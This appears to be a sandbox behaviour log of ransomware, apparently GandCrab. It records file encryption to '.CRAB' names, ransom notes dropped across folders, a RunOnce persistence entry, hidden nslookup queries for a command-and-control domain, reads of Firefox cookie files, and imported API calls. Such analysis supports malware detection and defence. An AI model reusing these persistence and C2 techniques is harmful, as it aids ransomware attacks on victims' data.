Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\KLdGRkhuNU3Axy.rtf type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\hWPRwg1\M5kzrLO8.pptx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\izrm4fve.odt type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\OpNt-Qn4ao6jyD.csv type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\RpT-bEGffs.ods type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\wQR1QuU.xls type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\igDES1iqMNIbmY DRa.pptx type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\qehE.doc type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\16UMlRP9A02gWyUy.ots type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\6uw alCfFW.pps type = file_attributes True 1
Fn
Move C:\Users\aETAdzjz\Desktop\4QM07F6yi6WlHQO.avi.CRAB source_filename = C:\Users\aETAdzjz\Desktop\4QM07F6yi6WlHQO.avi True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite.CRAB size = 1048576, size_out = 524288 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite.CRAB size = 1048576, size_out = 1048576 True 10
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite.CRAB size = 1048576, size_out = 0 True 1
Fn
Write C:\Program Files\\CRAB-DECRYPT.txt size = 3278 True 1
Fn
Data
Write C:\Program Files (x86)\\CRAB-DECRYPT.txt size = 3278 True 1
Fn
Data
Write C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt size = 3278 True 1
Fn
Write C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt size = 3278 True 1
Fn
Write C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt size = 3278 True 1
Fn
Write C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt size = 3278 True 1
Fn
Write C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt size = 3278 True 1
Fn
For performance reasons, the remaining 2210 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (48)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = vnbikupakju, data = "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\nhkaro.exe", size = 112, type = REG_SZ True 1
Fn
Process (6)
»
Operation Process Additional Information Success Count Logfile
Create nslookup carder.bit ns1.wowservers.ru os_pid = 0x424, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup carder.bit ns1.wowservers.ru os_pid = 0xbd0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup carder.bit ns1.wowservers.ru os_pid = 0x48c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\wbem\wmic.exe show_window = SW_HIDE True 1
Fn
Create cmd.exe show_window = SW_HIDE True 1
Fn
Create https://www.torproject.org/download/download-easy.html.en show_window = SW_SHOW False 1
Fn
Module (2198)
»
Operation Module Additional Information Success Count Logfile
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x74540000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 4
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x74cb0000 True 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 2
Fn
Load kernel32.dll base_address = 0x74cb0000 True 1
Fn
Load KERNEL32.dll base_address = 0x74cb0000 True 2
Fn
Load USER32.dll base_address = 0x75570000 True 4
Fn
Load ntdll.dll base_address = 0x770d0000 True 1
Fn
Load msvcr100.dll base_address = 0x74980000 True 1
Fn
Load GDI32.dll base_address = 0x75670000 True 1
Fn
Load ADVAPI32.dll base_address = 0x750d0000 True 1
Fn
Load SHELL32.dll base_address = 0x758a0000 True 1
Fn
Load CRYPT32.dll base_address = 0x74ee0000 True 1
Fn
Load WININET.dll base_address = 0x76b40000 True 1
Fn
Load PSAPI.DLL base_address = 0x75890000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74cb0000 True 2
Fn
Get Handle c:\users\public\rt0fv0ph.exe base_address = 0x400000 True 1
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x770d0000 True 10
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x750d0000 True 922
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\public\rt0fv0ph.exe, file_name_orig = C:\Users\Public\RT0FV0pH.exe, size = 260 True 2
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\public\rt0fv0ph.exe, file_name_orig = C:\Users\Public\RT0FV0pH.exe, size = 256 True 7
Fn
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = InitializeCriticalSectionEx, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x74cc4f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x74cc4208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x74cc1252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x74d447f1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x74cc168c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x74cc435f True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x74cc49d7 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x74cc1856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x74cc186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x74cc3519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x74cdd802 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x74cc1809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x74cc1136 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x74cc1986 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x74cc10ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x74cc4950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x74cc3f5c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x7712d598 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74cc11c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x74cc1222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x74cc7a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x74cc1245 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x74cc1410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x74cc11f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExW, address_out = 0x74cc1ae5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74cc1700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x74cc7a2f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x74cc34d5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x74ce7aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x74cdc807 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x74cc195e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x74d4454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x74cc1328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x74d67bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x74cc469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x74cc51a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74cc11a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x74cc1450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77110fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77109d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x74cc4a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x74cc192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x74cc170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74cc14e9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x74cc51b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x74cc3531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771045f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x74cc4d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x74cc14b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x74cc1282 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x74cc1725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x74cc3509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x74cc51e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x74cc51cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x74cc4a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x74cc5235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x74ce772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x74cc87c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x74cc1916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x74cc49ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x74cc11e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x74cc14fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x74cc3587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x74cc34b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x770f22b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x770f2270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74cc14c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x74cc4493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x74cc179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x74ced1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x74cc5189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x74cc495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x74ced1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x770fe026 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77111f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x74cc1946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77103002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x74cc17b9 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetFocus, address_out = 0x75592175 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75589679 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = CharUpperBuffW, address_out = 0x7558fc5d True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x75592320 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x75587d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x755878e2 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75587809 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7558787b True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetForegroundWindow, address_out = 0x755af170 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771025dd True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7558b17d True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75588a29 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75589a55 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75590dfb True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = keybd_event, address_out = 0x755e02bf True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75593559 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowTextW, address_out = 0x755920ec True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetWindowLongW, address_out = 0x75586ffe True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x75588332 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SystemParametersInfoW, address_out = 0x755890d3 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetAncestor, address_out = 0x75589785 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlUnwind, address_out = 0x77116d39 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7499c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x74cc359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x74cc4d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x74d4410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x74d44195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x74ccd31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x74cdee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7711441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7713c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7713c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x74cdf088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771205d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7713ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x770f0b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x771afde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77141e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x74d44761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x74d3cd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x74d4424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x74d446b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x74d56676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x74d44751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x74d565f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x74d447c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x74d447e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x74cdeee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsMenu, address_out = 0x75595cb1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x74cdd423 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x74cc4220 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x74cc2d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x74cc4173 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x74cc103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x74cd195c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x74ce2b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x74d4415b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x74ce8baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x74ce896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x74ce735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74cc4435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x74cc1b18 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74cc5929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x74cd9af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x74cc4442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x74cc54ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x74cdd4f7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x74cd10b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x74ccdd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x74cc43e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x74cdc860 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x74cc5063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x77102c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x771492b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x74cc418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x74ce828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x74cdd5cd True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x74cc1909 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x74cc1826 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x74cc18f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x74cc196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x74cc1b48 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x74ce2a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x74cc424c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x74ce3102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x74cc5558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x74cdd4dc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MulDiv, address_out = 0x74cc1b80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x74cc588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x74cc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x74cc3ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x74cc3e8e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x74cdf7aa True 1
Fn
